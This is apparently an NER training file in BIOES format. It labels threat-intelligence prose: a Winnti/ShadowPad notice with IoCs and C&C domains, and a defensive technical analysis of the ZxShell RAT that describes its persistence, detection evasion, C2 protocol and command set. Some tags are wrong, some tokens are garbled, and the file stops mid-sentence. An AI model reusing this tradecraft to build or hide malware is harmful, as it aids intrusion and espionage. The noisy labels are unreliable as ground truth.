+The O
+Winnti B-APT
+Group E-APT
+is O
+still O
+actively O
+using O
+one O
+of O
+its O
+flagship O
+backdoors S-MAL
+, O
+ShadowPad S-MAL
+, O
+this O
+time O
+against O
+Hong B-LOC
+Kong E-LOC
+universities O
+. O
+
+In O
+this O
+campaign O
+, O
+the O
+VMProtected S-TOOL
+launcher O
+used O
+with O
+ShadowPad S-MAL
+, O
+as O
+well O
+as O
+with O
+the O
+PortReuse B-MAL
+backdoor E-MAL
+and O
+skip-2.0 S-MAL
+, O
+was O
+replaced O
+by O
+a O
+simpler O
+one O
+. O
+
+That O
+these O
+samples O
+, O
+in O
+addition O
+to O
+having O
+been O
+found O
+at O
+these O
+universities O
+, O
+contain O
+campaign O
+IDs O
+matching O
+the O
+universities O
+’ O
+names O
+and O
+use O
+C&C S-TOOL
+URLs O
+containing O
+the O
+universities O
+��� O
+names O
+are O
+good O
+indications O
+that O
+this O
+campaign O
+is O
+highly O
+targeted O
+. O
+
+We O
+will O
+continue O
+to O
+monitor O
+new O
+activities O
+of O
+the O
+Winnti B-APT
+Group E-APT
+and O
+will O
+publish O
+relevant O
+information O
+on O
+our O
+blog O
+. O
+
+For O
+any O
+inquiries O
+, O
+contact O
+us O
+at O
+threatintel@eset.com O
+. O
+
+The O
+IoCs O
+are O
+also O
+available O
+in O
+our O
+GitHub S-TOOL
+repository O
+. O
+
+ESET S-IDTY
+detection O
+names O
+: O
+Win32 S-OS
+/ O
+Shadowpad.C S-FILE
+trojan S-MAL
+Win64 S-OS
+/ O
+Winnti.CA S-FILE
+trojan S-MAL
+. O
+
+Winnti S-APT
+: O
+hpqhvsei.dll S-FILE
+. O
+
+Winnti S-APT
+: O
+CLR.exe S-FILE
+. O
+
+Winnti S-APT
+: O
+hpqhvsei.dll S-FILE
+. O
+
+Winnti S-APT
+: O
+hpqhvind.exe S-FILE
+. O
+
+Winnti S-APT
+: O
+hpqhvsei.dll S-FILE
+. O
+
+Winnti S-APT
+: O
+oci.dll S-FILE
+. O
+
+Winnti S-APT
+: O
+C&C S-TOOL
+: O
+b[org_name].dnslookup.services S-URL
+: O
+443 O
+. O
+
+Winnti S-APT
+: O
+C&C S-TOOL
+: O
+w[org_name].livehost.live S-URL
+: O
+443 O
+. O
+
+Winnti S-APT
+: O
+C&C S-TOOL
+: O
+w[org_name].dnslookup.services S-URL
+: O
+443 O
+. O
+
+
+Middle B-LOC
+Eastern E-LOC
+hacking O
+group O
+is O
+using O
+FinFisher S-MAL
+malware O
+to O
+conduct O
+international O
+espionage O
+. O
+
+Recently O
+, O
+there O
+was O
+a O
+blog O
+post O
+on O
+the O
+takedown O
+of O
+a O
+botnet S-MAL
+used O
+by O
+threat O
+actor O
+group O
+known O
+as O
+Group B-APT
+72 E-APT
+and O
+their O
+involvement O
+in O
+Operation B-ACT
+SMN E-ACT
+. O
+
+This O
+group O
+is O
+sophisticated O
+, O
+well O
+funded O
+, O
+and O
+exclusively O
+targets O
+high O
+profile O
+organizations O
+with O
+high O
+value O
+intellectual O
+property O
+in O
+the O
+manufacturing O
+, O
+industrial O
+, O
+aerospace O
+, O
+defense O
+, O
+and O
+media O
+sector O
+. O
+
+The O
+primary O
+attack O
+vectors O
+are O
+watering-hole S-ACT
+, O
+spear B-ACT
+phishing E-ACT
+, O
+and O
+other O
+web-based O
+attacks O
+. O
+
+Frequently O
+, O
+a O
+remote B-TOOL
+administration I-TOOL
+tool E-TOOL
+( O
+RAT S-TOOL
+) O
+is O
+used O
+to O
+maintain O
+persistence O
+within O
+a O
+victim O
+’s O
+organization O
+. O
+
+These O
+tools O
+are O
+used O
+to O
+further O
+compromise O
+the O
+organization O
+by O
+attacking O
+other O
+hosts O
+inside O
+the O
+targets O
+network O
+. O
+
+ZxShell S-MAL
+( O
+aka O
+Sensocode S-MAL
+) O
+is O
+a O
+Remote B-TOOL
+Administration I-TOOL
+Tool E-TOOL
+( O
+RAT S-TOOL
+) O
+used O
+by O
+Group B-APT
+72 E-APT
+to O
+conduct O
+cyber-espionage O
+operations O
+. O
+
+Once O
+the O
+RAT S-TOOL
+is O
+installed O
+on O
+the O
+host O
+it O
+will O
+be O
+used O
+to O
+administer O
+the O
+client O
+, O
+exfiltrate O
+data O
+, O
+or O
+leverage O
+the O
+client O
+as O
+a O
+pivot O
+to O
+attack B-ACT
+an I-ACT
+organization I-ACT
+’s I-ACT
+internal I-ACT
+infrastructure E-ACT
+. O
+
+Here O
+is O
+a O
+short O
+list O
+of O
+the O
+types O
+of O
+tools O
+included O
+with O
+ZxShell S-MAL
+: O
+
+Keylogger S-TOOL
+( O
+used O
+to O
+capture O
+passwords O
+and O
+other O
+interesting O
+data O
+) O
+. O
+
+Command B-TOOL
+line I-TOOL
+shell E-TOOL
+for O
+remote O
+administration O
+. O
+
+Remote B-TOOL
+desktop E-TOOL
+. O
+
+Various B-TOOL
+network I-TOOL
+attack I-TOOL
+tools E-TOOL
+used O
+to O
+fingerprint O
+and O
+compromise O
+other O
+hosts O
+on O
+the O
+network O
+. O
+
+Local B-TOOL
+user I-TOOL
+account I-TOOL
+creation I-TOOL
+tools E-TOOL
+. O
+
+For O
+a O
+complete O
+list O
+of O
+tools O
+please O
+see O
+the O
+MainConnectionIo O
+section O
+. O
+
+The O
+following O
+paper O
+is O
+a O
+technical O
+analysis O
+on O
+the O
+functionality O
+of O
+ZxShell S-MAL
+. O
+
+The O
+analysts O
+involved O
+were O
+able O
+to O
+identify O
+command B-TOOL
+and I-TOOL
+control E-TOOL
+( O
+C2 S-TOOL
+) O
+servers O
+, O
+dropper O
+and O
+installation O
+methods O
+, O
+means O
+of O
+persistence O
+, O
+and O
+identify O
+the O
+attack O
+tools O
+that O
+are O
+core O
+to O
+the O
+RAT S-TOOL
+’s O
+purpose O
+. O
+
+In O
+addition O
+, O
+the O
+researchers O
+used O
+their O
+analysis O
+to O
+provide O
+detection O
+coverage O
+for O
+Snort S-TOOL
+, O
+Fireamp S-TOOL
+, O
+and O
+ClamAV S-TOOL
+. O
+
+ZxShell S-MAL
+has O
+been O
+around O
+since O
+2004 S-TIME
+. O
+
+There O
+are O
+a O
+lot O
+of O
+versions O
+available O
+in O
+the O
+underground O
+market O
+. O
+
+We O
+have O
+analyzed O
+the O
+most O
+common O
+version O
+of O
+ZxShell S-MAL
+, O
+version O
+3.10 O
+. O
+
+There O
+are O
+newer O
+versions O
+, O
+up O
+to O
+version O
+3.39 O
+as O
+of O
+October B-TIME
+2014 E-TIME
+. O
+
+An O
+individual O
+who O
+goes O
+by O
+the O
+name O
+LZX O
+in O
+some O
+online O
+forums O
+is O
+believed O
+to O
+be O
+the O
+original O
+author O
+of O
+ZxShell S-MAL
+. O
+
+Since O
+ZxShell S-MAL
+has O
+been O
+around O
+since O
+at O
+least B-TIME
+2004 E-TIME
+, O
+numerous O
+people O
+have O
+purchased O
+or O
+obtained O
+the O
+tools O
+necessary O
+to O
+set O
+up O
+ZxShell S-MAL
+command B-TOOL
+and I-TOOL
+control E-TOOL
+servers O
+( O
+C&C S-TOOL
+) O
+and O
+generate O
+the O
+malware O
+that O
+is O
+placed O
+on O
+the O
+victim O
+’s O
+network O
+. O
+
+ZxShell S-MAL
+has O
+been O
+observed O
+to O
+be O
+distributed O
+through O
+phishing B-ACT
+attacks E-ACT
+, O
+dropped O
+by O
+exploits O
+that O
+leverage O
+vulnerabilities O
+such O
+as O
+CVE-2011-2462 S-VULID
+, O
+CVE-2013-3163 S-VULID
+, O
+and O
+CVE-2014-0322 S-VULID
+. O
+
+To O
+illustrate O
+the O
+functionality O
+of O
+main O
+ZxShell S-MAL
+module O
+, O
+Let O
+’s O
+take O
+a O
+look O
+at O
+the O
+following O
+sample O
+: O
+
+MD5 S-ENCR
+: O
+e3878d541d17b156b7ca447eeb49d96a S-MD5
+. O
+
+SHA256 S-ENCR
+: O
+1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c S-SHA2
+. O
+
+It O
+exports O
+the O
+following O
+functions O
+, O
+which O
+are O
+examined O
+in O
+greater O
+detail O
+below O
+: O
+DllMain O
+Install O
+UnInstall O
+ServiceMain O
+ShellMain O
+ShellMainThread O
+zxFunction001 O
+zxFunction002 O
+. O
+
+DllMain O
+performs O
+the O
+initialization O
+of O
+ZxShell S-MAL
+. O
+
+It O
+allocates O
+a O
+buffer O
+of O
+0x2800 O
+bytes O
+and O
+copies O
+the O
+code O
+for O
+the O
+ZxGetLibAndProcAddr O
+function O
+. O
+
+To O
+copy O
+memory O
+, O
+the O
+memcpy O
+function O
+is O
+invoked O
+. O
+
+It O
+is O
+not O
+directly O
+used O
+from O
+msvcrt.dll S-FILE
+but O
+is O
+instead O
+copied O
+to O
+another O
+memory O
+chunk O
+before O
+being O
+called O
+. O
+
+Finally O
+, O
+the O
+trojan S-MAL
+Import B-TOOL
+Address I-TOOL
+Table E-TOOL
+( O
+IAT S-TOOL
+) O
+is O
+resolved O
+and O
+the O
+file O
+path O
+of O
+the O
+process O
+that O
+hosts O
+the O
+DLL S-TOOL
+is O
+resolved O
+and O
+saved O
+in O
+a O
+global O
+variable O
+. O
+
+ZxShell.dll S-FILE
+is O
+injected O
+in O
+a O
+shared O
+SVCHOST S-TOOL
+process O
+. O
+
+The O
+Svchost S-TOOL
+group O
+registry O
+key O
+HKLM\SOFTWARE\Microsoft\Windows S-OS
+NT\CurrentVersion\SvcHost O
+is O
+opened O
+and O
+the O
+netsvc S-TOOL
+group O
+value O
+data O
+is O
+queried O
+to O
+generate O
+a O
+name O
+for O
+the O
+service O
+. O
+
+Before O
+the O
+malware O
+can O
+be O
+installed O
+a O
+unique O
+name O
+must O
+to O
+be O
+generated O
+for O
+the O
+service O
+. O
+
+The O
+malware O
+accomplishes O
+this O
+through O
+querying O
+the O
+netsvc S-TOOL
+group O
+value O
+data O
+located O
+in O
+the O
+svchost S-TOOL
+group O
+registry O
+key O
+which O
+is O
+HKLM\SOFTWARE\Microsoft\Windows S-OS
+NT\CurrentVersion\SvcHost O
+. O
+
+At O
+startup O
+, O
+Svchost.exe S-FILE
+checks O
+the O
+services O
+part O
+of O
+the O
+registry O
+and O
+constructs O
+a O
+list O
+of O
+services O
+to O
+load O
+. O
+
+Each O
+Svchost S-TOOL
+session O
+can O
+contain O
+multiple O
+shared O
+services O
+that O
+are O
+organized O
+in O
+groups O
+. O
+
+Therefore O
+, O
+separate O
+services O
+can O
+run O
+, O
+depending O
+on O
+how O
+and O
+where O
+Svchost.exe S-FILE
+is O
+started O
+. O
+
+Svchost.exe S-FILE
+groups O
+are O
+identified O
+in O
+the O
+above O
+registry O
+key O
+. O
+
+Each O
+value O
+under O
+this O
+key O
+represents O
+a O
+separate O
+Svchost S-TOOL
+group O
+and O
+appears O
+as O
+a O
+separate O
+instance O
+when O
+you O
+are O
+viewing O
+active O
+processes O
+. O
+
+Each O
+value O
+is O
+a O
+REG_MULTI_SZ O
+value O
+and O
+contains O
+the O
+services O
+that O
+run O
+under O
+that O
+Svchost S-TOOL
+group O
+. O
+
+Each O
+Svchost S-TOOL
+group O
+can O
+contain O
+one O
+or O
+more O
+service O
+names O
+that O
+are O
+extracted O
+from O
+the O
+following O
+registry O
+key O
+, O
+whose O
+Parameters O
+key O
+contains O
+a O
+ServiceDLL S-TOOL
+value O
+: O
+HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Service O
+. O
+
+On O
+a O
+Windows S-OS
+machine O
+, O
+the O
+netsvc S-TOOL
+group O
+contains O
+names O
+of O
+both O
+existing O
+and O
+non-existing O
+services O
+. O
+
+ZxShell S-MAL
+exploits O
+this O
+fact O
+by O
+cycling O
+between O
+each O
+of O
+the O
+names O
+, O
+verifying O
+the O
+existence O
+of O
+the O
+real O
+service O
+. O
+
+The O
+service O
+’s O
+existence O
+is O
+verified O
+with O
+the O
+ServiceExists O
+function O
+, O
+which O
+attempts O
+to O
+open O
+the O
+relative O
+registry O
+sub-key O
+in O
+HKLM\SYSTEM\CurrentControlSet\Services O
+. O
+
+The O
+first O
+service O
+name O
+that O
+is O
+not O
+installed O
+on O
+the O
+system O
+becomes O
+the O
+ZxShell S-MAL
+service O
+name O
+. O
+
+A O
+new O
+service O
+is O
+then O
+created O
+using O
+the O
+service O
+parser O
+function O
+ProcessScCommand O
+. O
+
+ZxShell S-MAL
+implemented O
+its O
+own O
+version O
+of O
+the O
+Windows B-TOOL S-OS I-TOOL
+SC I-TOOL
+command E-TOOL
+. O
+
+There O
+are O
+minor O
+differences O
+between O
+the O
+ZxShell S-MAL
+implementation O
+of O
+this O
+command O
+and O
+the O
+original O
+Windows S-OS
+one O
+. O
+
+The O
+installed O
+service O
+registry O
+key O
+is O
+opened O
+and O
+the O
+2 O
+values O
+under O
+its O
+Parameter O
+subkey O
+are O
+created O
+. O
+
+These O
+2 O
+values O
+, O
+ServiceDll S-TOOL
+and O
+ServiceDllUnloadOnStop S-TOOL
+are O
+needed O
+for O
+services O
+that O
+run O
+in O
+a O
+shared O
+process O
+. O
+
+Before O
+the O
+service O
+is O
+started O
+ChangeServiceConfig O
+is O
+called O
+to O
+modify O
+the O
+service O
+type O
+to O
+shared O
+and O
+interactive O
+. O
+
+If O
+the O
+service O
+fails O
+to O
+start O
+then O
+a O
+random O
+service O
+name O
+formatted O
+as O
+netsvc_xxxxxxxx O
+, O
+where O
+xxxxxxxx O
+represent O
+an O
+8-digit O
+random O
+hex O
+value O
+, O
+is O
+added O
+to O
+the O
+netsvc S-TOOL
+group O
+and O
+the O
+entire O
+function O
+is O
+repeated O
+. O
+
+This O
+function O
+is O
+the O
+entry O
+point O
+of O
+the O
+service O
+. O
+
+It O
+registers O
+the O
+service O
+using O
+the O
+RegisterServiceCtrlHandler O
+Windows S-OS
+API O
+function O
+. O
+
+The O
+ZxShell S-MAL
+service O
+handler O
+routine O
+is O
+only O
+a O
+stub O
+: O
+it O
+responds O
+to O
+each O
+service O
+request O
+code O
+, O
+doing O
+nothing O
+, O
+and O
+finally O
+exits O
+. O
+
+It O
+sets O
+the O
+service O
+status O
+to O
+RUNNING O
+and O
+finally O
+calls O
+the O
+ShellMain O
+function O
+of O
+ZxShell S-MAL
+. O
+
+The O
+ShellMain O
+function O
+is O
+a O
+stub O
+that O
+relocates O
+the O
+DLL S-TOOL
+to O
+another O
+buffer O
+and O
+spawns O
+a O
+thread O
+that O
+starts O
+from O
+ShellMainThreadInt O
+at O
+offset O
++0xC0CD O
+. O
+
+The O
+ShellMainThreadInt O
+function O
+gets O
+the O
+HeapDestroy O
+Windows S-OS
+API O
+address O
+and O
+replaces O
+the O
+first O
+3 O
+bytes O
+with O
+the O
+RET O
+4 O
+opcode O
+. O
+
+Subsequently O
+, O
+it O
+calls O
+the O
+FreeLibrary O
+function O
+to O
+free O
+its O
+own O
+DLL S-TOOL
+buffer O
+located O
+at O
+its O
+original O
+address O
+. O
+
+Because O
+of O
+this O
+, O
+the O
+allocated O
+heaps O
+will O
+not O
+be O
+freed O
+. O
+
+It O
+re-copies O
+the O
+DLL S-TOOL
+from O
+the O
+new O
+buffer O
+to O
+the O
+original O
+one O
+using O
+the O
+memcpy O
+function O
+. O
+
+Finally O
+, O
+it O
+spawns O
+the O
+main O
+thread O
+that O
+starts O
+at O
+the O
+original O
+location O
+of O
+ShellMainThread O
+procedure O
+, O
+and O
+terminates O
+. O
+
+At O
+this O
+point O
+, O
+the O
+ZxShell S-MAL
+library O
+is O
+no O
+longer O
+linked O
+in O
+the O
+module O
+list O
+of O
+the O
+host O
+process O
+. O
+
+This O
+is O
+important O
+because O
+if O
+any O
+system O
+tool O
+tries O
+to O
+open O
+the O
+host O
+process O
+it O
+will O
+never O
+display O
+the O
+ZxShell S-MAL
+DLL S-TOOL
+. O
+
+This O
+thread O
+implements O
+the O
+main O
+code O
+, O
+responsible O
+for O
+the O
+entire O
+botnet S-MAL
+DLL S-TOOL
+. O
+
+First O
+, O
+it O
+checks O
+if O
+the O
+DLL S-TOOL
+is O
+executed O
+as O
+a O
+service O
+. O
+
+If O
+so O
+, O
+it O
+spawns O
+the O
+service O
+watchdog S-TOOL
+thread O
+. O
+
+The O
+watchdog S-TOOL
+thread O
+checks O
+the O
+registry O
+path O
+of O
+the O
+ZxShell S-MAL
+service O
+every O
+2 O
+seconds O
+, O
+to O
+verify O
+that O
+it O
+has O
+n’t O
+been O
+modified O
+. O
+
+If O
+a O
+user O
+or O
+an O
+application O
+modifies O
+the O
+ZxShell S-MAL
+service O
+registry O
+key O
+, O
+the O
+code O
+restores O
+the O
+original O
+infected O
+service O
+key O
+and O
+values O
+. O
+
+The O
+buffer O
+containing O
+the O
+ZxShell S-MAL
+Dll S-TOOL
+in O
+the O
+new O
+location O
+is O
+freed O
+using O
+the O
+VirtualFree O
+API O
+function O
+. O
+
+A O
+handle O
+to O
+the O
+DLL S-TOOL
+file O
+is O
+taken O
+in O
+order O
+to O
+make O
+its O
+deletion O
+more O
+difficult O
+. O
+
+The O
+ZxShell S-TOOL
+mutex O
+is O
+created O
+named O
+@_ZXSHELL_@ O
+. O
+
+ZxShell S-MAL
+plugins O
+are O
+parsed O
+and O
+loaded O
+with O
+the O
+AnalyseAndLoadPlugins O
+function O
+. O
+
+The O
+plugin O
+registry O
+key O
+HKLM\SYSTEM\CurrentControlSet\Control\zxplug O
+is O
+opened O
+and O
+each O
+value O
+is O
+queried O
+. O
+
+The O
+registry O
+value O
+contains O
+the O
+plugin O
+file O
+name O
+. O
+
+The O
+target O
+file O
+is O
+loaded O
+using O
+the O
+LoadLibrary O
+API O
+function O
+, O
+and O
+the O
+address O
+of O
+the O
+exported O
+function O
+zxMain O
+is O
+obtained O
+with O
+GetProcAddress O
+. O
+
+If O
+the O
+target O
+filename O
+is O
+incorrect O
+or O
+invalid O
+the O
+plugin O
+file O
+is O
+deleted O
+and O
+the O
+registry O
+value O
+is O
+erased O
+. O
+
+That O
+is O
+performed O
+by O
+the O
+function O
+DeleteAndLogPlugin O
+. O
+
+Otherwise O
+, O
+the O
+plugin O
+is O
+added O
+to O
+an O
+internal O
+list O
+. O
+
+The O
+thread O
+KeyloggerThread S-APT
+is O
+spawned O
+and O
+is O
+responsible O
+for O
+doing O
+keylogging O
+on O
+the O
+target O
+workstation O
+. O
+
+We O
+will O
+take O
+a O
+look O
+at O
+the O
+keylogger S-TOOL
+later O
+on O
+. O
+
+Finally O
+the O
+main O
+network O
+communication O
+function O
+GetIpListAndConnect O
+is O
+called O
+. O
+
+This O
+function O
+is O
+at O
+the O
+core O
+of O
+the O
+RAT S-TOOL
+’s O
+network O
+communication O
+. O
+
+It O
+starts O
+by O
+initializing O
+a O
+random O
+number O
+generator O
+and O
+reading O
+100 O
+bytes O
+inside O
+the O
+ZxShell S-MAL
+Dll S-TOOL
+at O
+a O
+hardcoded O
+location O
+. O
+
+These O
+bytes O
+are O
+XOR S-ENCR
+encrypted O
+with O
+the O
+byte-key O
+0x85 O
+and O
+contains O
+a O
+list O
+of O
+remote O
+hosts O
+where O
+to O
+connect O
+. O
+
+The O
+data O
+is O
+decrypted O
+, O
+the O
+remote O
+host O
+list O
+is O
+parsed O
+and O
+verified O
+using O
+the O
+BuildTargetIpListStruct O
+function O
+. O
+
+There O
+are O
+3 O
+types O
+of O
+lists O
+recognized O
+by O
+ZxShell S-MAL
+: O
+plain O
+ip O
+addresses O
+, O
+HTTP S-PROT
+and O
+FTP S-PROT
+addresses O
+. O
+
+If O
+the O
+list O
+does O
+not O
+contain O
+any O
+item O
+, O
+or O
+if O
+the O
+verification O
+has O
+failed O
+, O
+the O
+ZxShell S-MAL
+sample O
+tries O
+to O
+connect O
+to O
+a O
+hardcoded O
+host O
+
+with O
+the O
+goal O
+of O
+retrieving O
+a O
+new O
+updated O
+list O
+. O
+
+Otherwise O
+, O
+ZxShell S-MAL
+tries O
+to O
+connect O
+to O
+the O
+first O
+item O
+of O
+the O
+list O
+. O
+
+If O
+ZxShell S-MAL
+successfully O
+connects O
+to O
+the O
+remote O
+host O
+, O
+the O
+function O
+DoHandshake O
+is O
+called O
+. O
+
+This O
+function O
+implements O
+the O
+initial O
+handshake O
+which O
+consists O
+of O
+exchanging O
+16 O
+bytes O
+, O
+0x00001985 O
+and O
+0x00000425, O
+
+with O
+the O
+server O
+. O
+
+The O
+function O
+GetLocalPcDescrStr O
+is O
+used O
+to O
+compose O
+a O
+large O
+string O
+that O
+contains O
+system O
+information O
+of O
+the O
+target O
+workstation O
+. O
+
+The O
+string O
+is O
+sent O
+to O
+the O
+remote O
+host O
+and O
+the O
+response O
+is O
+checked O
+to O
+see O
+if O
+the O
+first O
+byte O
+of O
+the O
+response O
+is O
+0xF4, O
+an O
+arbitrary O
+byte O
+. O
+
+If O
+it O
+is O
+, O
+the O
+botnet S-MAL
+connection O
+I/O O
+procedure O
+is O
+called O
+through O
+the O
+MainConnectionIo O
+function O
+. O
+
+Otherwise O
+, O
+the O
+ZxShell S-MAL
+code O
+closes O
+the O
+socket O
+used O
+and O
+sleeps O
+for O
+30 O
+seconds O
+. O
+
+It O
+will O
+then O
+retry O
+the O
+connection O
+with O
+the O
+next O
+remote O
+host O
+, O
+if O
+there O
+is O
+one O
+. O
+
+It O
+is O
+noteworthy O
+that O
+this O
+function O
+includes O
+the O
+code O
+to O
+set O
+the O
+ZxShell S-MAL
+node O
+as O
+a O
+server O
+: O
+if O
+one O
+of O
+the O
+hardcoded O
+boolean O
+value O
+is O
+set O
+to O
+1, O
+a O
+listening O
+socket O
+is O
+created O
+. O
+
+The O
+code O
+waits O
+for O
+an O
+incoming O
+connection O
+. O
+
+When O
+the O
+connection O
+is O
+established O
+a O
+new O
+thread O
+is O
+spawned O
+that O
+starts O
+with O
+the O
+MainConnectionIo O
+function O
+. O
+
+The O
+MainConnectionIo O
+function O
+checks O
+if O
+the O
+Windows S-OS
+Firewall S-TOOL
+is O
+enabled O
+, O
+sets O
+the O
+Tcp B-TOOL
+Keep I-TOOL
+Alive E-TOOL
+value O
+and O
+Non-blocking O
+mode O
+connection O
+options O
+and O
+receives O
+data O
+from O
+the O
+remote O
+host O
+through O
+the O
+ReceiveCommandData O
+function O
+. O
+
+Then O
+the O
+connection O
+is O
+retried O
+. O
+
+The O
+received O
+command O
+is O
+then O
+processed O
+by O
+the O
+ZxShell S-MAL
+function O
+with O
+the O
+ProcessCommand O
+function O
+. O
+
+The O
+command O
+processing O
+function O
+starts O
+by O
+substituting O
+the O
+main O
+module O
+name O
+and O
+path O
+in O
+the O
+hosting O
+process O
+PEB O
+, O
+with O
+the O
+one O
+of O
+the O
+default O
+internet O
+browser O
+. O
+
+This O
+trick O
+renders O
+identification O
+by O
+firewall S-TOOL
+more O
+cumbersome O
+. O
+
+A O
+host O
+firewall O
+
+ S-TOOLwill O
+recognize O
+the O
+outgoing O
+connection O
+as O
+originated O
+by O
+the O
+browser O
+instead O
+of O
+the O
+ZxShell S-MAL
+service O
+host O
+process O
+. O
+
+The O
+browser O
+process O
+always O
+performs O
+outgoing O
+connections O
+and O
+the O
+firewall S-TOOL
+should O
+n’t O
+block O
+them O
+. O
+
+The O
+command O
+processing O
+is O
+straightforward O
+. O
+
+Here O
+is O
+the O
+list O
+of O
+common O
+commands O
+: O
+
+Help O
+/ O
+? O
+Get O
+help O
+. O
+
+Exit O
+/ O
+Quit O
+Exit O
+and O
+shut O
+down O
+the O
+botnet O
+client O
+. O
+
+SysInfo O
+Get O
+target O
+System O
+information O
+. O
+
+SYNFlood O
+Perform O
+a O
+SYN O
+attack O
+on O
+a O
+host O
+. O
+
+Ps O
+Process O
+service O
+Unix S-OS
+command O
+implementation O
+. O
+
+CleanEvent O
+Clear O
+System O
+Event O
+log O
+. O
+
+FindPass O
+Find O
+login O
+account O
+password O
+. O
+
+FileTime O
+Get O
+time O
+information O
+about O
+a O
+file O
+. O
+
+FindDialPass O
+List O
+all O
+the O
+dial-up O
+accounts O
+and O
+passwords O
+. O
+
+User O
+Account O
+Management O
+System O
+. O
+
+TransFile O
+Transfer O
+file O
+in O
+or O
+from O
+remote O
+host O
+. O
+
+Execute O
+Run O
+a O
+program O
+in O
+the O
+remote O
+host O
+. O
+
+SC O
+Service O
+control O
+command O
+, O
+implemented O
+as O
+the O
+Windows S-OS
+one O
+. O
+
+CA O
+Clone O
+user O
+account O
+. O
+
+RunAs O
+Create O
+new O
+process O
+as O
+another O
+User O
+or O
+Process O
+context O
+. O
+
+TermSvc O
+Terminal O
+service O
+configuration O
+( O
+working O
+on O
+Win B-OS
+Xp/2003 E-OS
+) O
+. O
+
+GetCMD O
+Remote O
+Shell O
+. O
+
+Shutdown O
+Logout O
+, O
+shutdown O
+or O
+restart O
+the O
+target O
+system O
+. O
+
+ZXARPS O
+Spoofing O
+, O
+redirection O
+, O
+packet O
+capture O
+. O
+
+ZXNC O
+Run O
+ZXNC O
+v1.1 O
+– O
+a O
+simple O
+telnet O
+client O
+. O
+
+ZXHttpProxy O
+Run O
+a O
+HTTP O
+proxy O
+server O
+on O
+the O
+workstation O
+. O
+
+ZXSockProxy O
+Run O
+a O
+Sock O
+4 O
+& O
+5 O
+Proxy O
+server O
+. O
+
+ZXHttpServer O
+Run O
+a O
+custom O
+HTTP S-PROT
+server O
+. O
+
+PortScan O
+Run O
+TCP S-PROT
+Port O
+MultiScanner O
+v1.0 O
+. O
+
+KeyLog O
+Capture O
+or O
+record O
+the O
+remote O
+computer O
+’s O
+keystrokes O
+. O
+
+The O
+implementation O
+is O
+a O
+userland O
+keylogger S-TOOL
+that O
+polls O
+the O
+keymap O
+with O
+each O
+keystroke O
+. O
+
+LoadDll S-TOOL
+Load O
+a O
+DLL S-TOOL
+into O
+the O
+specified O
+process O
+. O
+
+End O
+Terminate O
+ZxShell S-MAL
+DLL S-TOOL
+. O
+
+Uninstall O
+Uninstall O
+and O
+terminate O
+ZxShell S-MAL
+bot O
+DLL S-TOOL
+. O
+
+ShareShell O
+Share O
+a O
+shell O
+to O
+other O
+. O
+
+CloseFW O
+Switch O
+off O
+Windows S-OS
+Firewall O
+. O
+
+FileMG O
+File O
+Manager O
+. O
+winvnc O
+Remote O
+Desktop O
+. O
+rPortMap O
+Port O
+Forwarding O
+. O
+capsrv O
+Video O
+Device O
+Spying O
+. O
+zxplug O
+Add O
+and O
+load O
+a O
+ZxShell S-MAL
+custom O
+plugin O
+. O
+
+This O
+set O
+of O
+functionality O
+allows O
+the O
+operator O
+complete O
+control O
+of O
+a O
+system O
+. O
+
+Being O
+able O
+to O
+transfer O
+and O
+execute O
+files O
+on O
+the O
+infected O
+system O
+means O
+the O
+attacker O
+can O
+run O
+any O
+code O
+they O
+please O
+. O
+
+Further O
+, O
+the O
+keylogging O
+and O
+remote O
+desktop O
+functionality O
+allows O
+the O
+operator O
+to O
+spy O
+on O
+the O
+infected O
+machine O
+, O
+observing O
+all O
+keystrokes O
+and O
+viewing O
+all O
+user O
+actions O
+. O
+
+Unloads O
+ZxShell S-MAL
+and O
+deletes O
+all O
+of O
+the O
+active O
+components O
+. O
+
+This O
+simply O
+deletes O
+the O
+ZxShell S-MAL
+service O
+key O
+from O
+the O
+Windows S-OS
+registry O
+( O
+using O
+SHDeleteKey O
+Api O
+) O
+and O
+all O
+of O
+the O
+subkeys O
+. O
+
+Finally O
+, O
+it O
+marks O
+ZxShell S-MAL
+main O
+Dll S-TOOL
+for O
+deletion O
+with O
+the O
+MoveFileEx O
+Windows S-OS
+API O
+. O
+
+This O
+function O
+is O
+the O
+supporting O
+functionality O
+for O
+WinVNC S-TOOL
+. O
+
+To O
+allow O
+the O
+VNC S-TOOL
+session O
+to O
+connect O
+, O
+the O
+current O
+network O
+socket O
+WSAProtcol_Info S-TOOL
+structure O
+is O
+written O
+to O
+a O
+named O
+pipe O
+prior O
+to O
+calling O
+zxFunction001 O
+. O
+zxFunction001 O
+modifies O
+the O
+current O
+process O
+memory O
+, O
+uses O
+data O
+contained O
+in O
+the O
+named O
+pipe O
+to O
+create O
+a O
+socket O
+, O
+and O
+then O
+executes O
+the O
+code O
+that O
+sends O
+the O
+remote O
+desktop O
+session O
+to O
+the O
+server O
+controller O
+. O
+
+ZxFunction002 O
+This O
+will O
+either O
+bind O
+the O
+calling O
+process O
+to O
+a O
+port O
+or O
+has O
+the O
+calling O
+process O
+connect O
+to O
+a O
+remote O
+host O
+. O
+
+The O
+functionality O
+( O
+connect O
+or O
+bind O
+) O
+depends O
+on O
+the O
+data O
+contained O
+within O
+the O
+named O
+pipe O
+. O
+
+Unlike O
+zxFunction001, O
+this O
+is O
+not O
+used O
+by O
+
+any O
+of O
+the O
+RAT S-TOOL
+commands O
+in O
+the O
+zxshell.dll S-FILE
+. O
+
+Apart O
+from O
+user-mode O
+ZxShell S-MAL
+droppers O
+mentioned O
+earlier O
+, O
+there O
+is O
+a O
+file O
+( O
+SHA256 S-ENCR
+: O
+1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 S-SHA2
+) O
+that O
+installs O
+a O
+kernel O
+device O
+driver O
+called O
+loveusd.sys S-FILE
+. O
+
+The O
+architecture O
+of O
+this O
+dropper O
+is O
+different O
+from O
+the O
+others O
+: O
+it O
+starts O
+extracting O
+the O
+main O
+driver O
+from O
+itself O
+. O
+
+It O
+adds O
+the O
+SeLoadDriver S-TOOL
+privilege O
+to O
+its O
+access O
+token O
+and O
+proceeds O
+to O
+install O
+the O
+driver O
+as O
+a O
+fake O
+disk O
+filter O
+driver O
+. O
+
+It O
+then O
+adds O
+the O
+“ O
+Loveusd.sys S-FILE
+” O
+extracted O
+driver O
+name O
+to O
+the O
+upper O
+filter O
+list O
+. O
+
+In O
+our O
+analysed O
+sample O
+the O
+“ O
+Loveusd.sys S-FILE
+” O
+driver O
+is O
+installed O
+with O
+the O
